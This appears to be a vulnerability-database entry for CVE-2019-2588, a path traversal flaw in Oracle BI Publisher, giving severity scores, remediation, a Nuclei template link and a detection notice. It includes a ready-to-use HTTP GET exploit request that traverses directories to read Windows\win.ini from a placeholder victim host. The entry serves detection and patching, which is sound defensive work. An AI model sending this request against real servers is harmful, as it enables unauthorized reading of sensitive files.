🔙 목록으로 돌아가기

CVE-2019-2588: Oracle Business Intelligence - Path Traversal

TitleOracle Business Intelligence - Path Traversal
Authormadrobot
SeverityMedium
ImpactAn attacker can read sensitive files on the system, potentially leading to unauthorized access or exposure of sensitive information.
RemediationApply the necessary patches or updates provided by Oracle to fix the path traversal vulnerability.
CVSS Score4.9
EPSS Score0.85962
CVE IDCVE-2019-2588
Tags cve cve2019 oracle lfi vkev vuln

🔍 Vulnerability Description

Oracle Business Intelligence versions 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0 are vulnerable to path traversal in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security).

🌐 HTTP Request

GET /xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-2588.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-2588.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A